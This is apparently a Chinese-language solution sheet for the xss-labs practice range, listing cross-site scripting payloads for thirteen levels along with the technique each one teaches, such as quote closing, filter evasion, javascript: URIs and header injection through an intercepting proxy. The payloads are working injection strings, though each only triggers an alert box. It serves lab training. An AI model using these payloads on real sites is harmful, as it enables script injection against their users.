靶场地址:
https://github.com/do0dl3/xss-labs.git
或:
https://github.com/do0dl3/xss-labs
解题payload:
1、<script>alert(111)</script>
2、'><script>alert(111)</script>
3、' oninput='alert(123) #然后在进行一次输入
4、" οninput="alert(123) #然后在进行一次输入
5、"><a href="javascript:alert(123)">123</a>
6、"><a hREf="JavaScript:alert(123)">123</a>
7、" oonninput="alert(123)"
8、javascript:alert()
9、javascript:alert(9) //http://
10、t_sort=" oninput="alert(123)" type="text"
11、referer:http://xss:8080/level10.php?keyword=123&t_sort=" οninput="alert(123)" type="text //bp
12、" οninput="alert(123)" type="text //bp
13、user=call+me+maybe%3F" οninput="alert(/xss/)" type="text //bp
其中第一题可以直接执行js。
2~7 讲闭合。
8、9讲实体化。
10讲隐藏属性。
11~13则是讲抓包,从其他位置进行攻击。